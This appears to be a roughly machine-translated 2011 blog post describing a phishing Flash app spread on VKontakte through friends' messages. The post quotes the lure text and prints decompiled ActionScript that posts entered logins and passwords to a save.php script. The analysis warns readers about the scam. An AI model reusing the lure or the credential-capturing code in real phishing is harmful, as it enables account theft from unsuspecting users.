Main » 2011 » Март » 16 » At vkontakte again tyryat passwords careless users
At vkontakte again tyryat passwords careless users
Today I received a message from one of his friends, his text read as follows:

Ppivetik, Denic. Smotpi kakoy chat vkontakte - / apps.php? Act = s & id = 236634 &.... Zaxodi ckopee to me In very ponpavilcya! Kycha impressions is pepepolnen-nedoctupen)))
message would take in trash, but the last sentence was concerned about - just so do not write.
Decided to see what a piece of fruit ...

Passed by reference, see the usual fleshevoy application, it looks like this:

After entering all the data form of throws that IM is overloaded.
Of course, wondered what gesture while it performs, for that I downloaded myself swf-files and fed him Swf Decompiler'u. After cutting it turned out that the passes and soap to fly POST'om

  1. var my_lv = new LoadVars ();
  2. var result_lv = new LoadVars () ;
  3. my_lv.login_v = _root.login_txt.text;
  4. my_lv.password_v = _root.password_txt.text;
  5. my_lv.sendAndLoad (« / save.php», result_lv , «POST»);

careless programmer who wrote this stick did not even bother to insert there checking the validity of email-addresses. Apparently been busy writing Malvar, which in this same "chat" people beckoning.

PS: passwords to steal, steal and will steal, but surprises only one thing: do people feel so stupid silly, making such pathetic attempts to steal passwords?
Views: 750 | Added by: w1zard | Rating: 0.0/0
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